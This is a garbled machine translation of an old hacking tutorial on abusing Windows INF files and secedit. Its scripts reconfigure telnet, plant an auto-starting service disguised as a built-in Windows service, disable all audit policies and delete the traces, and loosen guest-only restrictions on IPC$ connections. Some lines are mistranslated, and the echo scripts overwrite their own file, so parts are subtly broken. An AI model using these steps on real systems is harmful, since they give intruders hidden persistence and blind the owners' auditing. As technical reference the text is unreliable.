. Inf file hacking-hoky (hoky Security Team)

Source: Internet
Author: User
. Inf file hacking
SubmittedIcebergOn 2004, October 29, am.Miscellaneous
This article does not describe the basics of the INF file.
For more information about the INF file structure, see the DDK help documentation.

1. Modify the telnet service, change the port to 99, and set the NTLM authentication method to 1.
C:/myinf/telnet. inf

[Version]
Signature = "$ Windows NT $"
[Defainstall install]
Addreg = addregname
[My_addreg_name]
HKLM, software/Microsoft/telnetserver.0, telnetport, 0x00010001,99
HKLM, software/Microsoft/telnetserver.0, NTLM, 0x00010001,1

Install: rundll32.exe setupapi, installhinfsection defaultinstall 128 C:/myinf/telnet. inf

Note: [version] and [defainstall install] are required. 0x00010001 indicates the REG_DWORD data type, and 0x00000000 indicates REG_SZ (string ). 0x00020000 indicates reg_expand_sz.
Installhinfsection is case sensitive. It has only one comma and no space between it and setupapi. 128 indicates the specified path. For other values and meanings of this parameter, see msdn.
Note that the last parameter must be the full path of the INF file. Do not use relative paths.
The items in the INF file are case-insensitive.

Ii. Service

Add a service:
[Version]
Signature = "$ Windows NT $"
[Defainstall install. Services]
Addservice = inetsvr, my_addservice_name
[My_addservice_name]
Displayname = Windows Internet Service
Description = supports Internet information service management.
Servicetype = 0x10
Starttype = 2
Errorcontrol = 0
Servicebinary = % 11%/inetsvr.exe

Save as inetsvr. inf, and then:

Rundll32.exe setupapi, installhinfsection defaultinstall 128 C:/path/inetsvr. inf

In this example, a service named inetsvr is added (is it similar to the service provided by the system ).

Notes:
1. The last four items are
Service type: 0x10 is an independent process service, and 0x20 is a shared process service (such as svchost );
Startup Type: 0 system boot loading, 1 OS initialization loading, 2 SCM (Service Control Manager) automatic start, 3 manual start, 4 disabled.
(Note: 0 and 1 can only be used for drivers)
Error Control: 0 ignore, 1 continue and warn, 2 switch to lastknowngood settings, 3 blue screen.
Service Program location: % 11% indicates the System32 directory, % 10% indicates the system directory (winnt or Windows), and % 12% indicates the drive directory system32/drivers. For other values, see DDK. You can also directly use the full path without variables.
These four items are mandatory.
2. In addition to the six projects in the example, there are loadordergroup and dependencies. Not commonly used.
3. inetsvr is followed by two commas, because an uncommon parameter flags is omitted in the middle.

Delete A service:
[Version]
Signature = "$ Windows NT $"
[Defainstall install. Services]
Delservice = inetsvr

It's easy, isn't it?

You can also import the registry. However, INF has its own advantages.
1. Export a registry key that comes with the system service. You will find that the execution path is as follows:
"ImagePath" = hex (2): 25, 00, 53,00, 79,00, 00, 6d, 00, 6f, 00, 6f, 00 ,/
, 00, 5C, 79, 00, 00, 6d, 00, 00, 5C ,/
00, 6C, 00, 6e, 00, 00, 00, 00

Poor readability. In fact, it is % SystemRoot %/system32/tlntsvr.exe, but the data type is reg_expand_sz. When you manually import the Registry to add services, it is obviously inconvenient to define ImagePath. If REG_SZ is used instead, there will be some problems-you cannot use environment variables. You can only use the full path. There is no such problem with the INF file. servicebinary (that is, ImagePath) automatically becomes reg_expand_sz.
2. The most important thing is that, like using SC and other tools, the effect of the INF file is immediate, and the file must be restarted after the Reg is imported.
3. The inf file automatically adds a security sub-key for the Registry Key of the Service to make it look more like the built-in service of the system.

In addition, addservice, delservice, addreg, and delreg can be used simultaneously and repeatedly. That is, multiple services and registry keys can be added and deleted at the same time.

Iii. Group Policy

1. The minimum password is 6 characters.
[Version]
Signature = "$ Chicago $"
[System Access]
Minimumpasswordlength = 6
Passwordcomplexity = 1

Save as GP. inf, and then import:
SeCEdit/configure/db gp. sdb/cfg gp. inf/quiet

2. Close all audit policies
Echo [version]> 1.inf
Echo Signature = "$ Chicago $"> 1.inf
Echo [event audit]> 1.inf
Echo auditsystemevents = 0> 1.inf
Echo auditobjectaccess = 0> 1.inf
Echo auditprivilegeuse = 0> 1.inf
Echo auditpolicychange = 0> 1.inf
Echo auditaccountmanage = 0> 1.inf
Echo AuditProcessTracking = 0> 1.inf
Echo auditdsaccess = 0> 1.inf
Echo auditaccountlogon = 0> 1.inf
Echo auditlogonevents = 0> 1.inf
SeCEdit/configure/DB 1.sdb/CFG 1.inf/log 1.log/quiet
Del 1 .*

4. Solve the xp ipc $ connection and only have the guest permission

Echo [version]> 1.inf
Echo Signature = "$ Chicago $"> 1.inf
Echo [registry values]> 1.inf
Echo machine/system/CurrentControlSet/control/LSA/forceguest = 4,0> 1.inf
SeCEdit/configure/DB 1.sdb/CFG 1.inf/log 1.log
Del 1 .*

<Continued>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.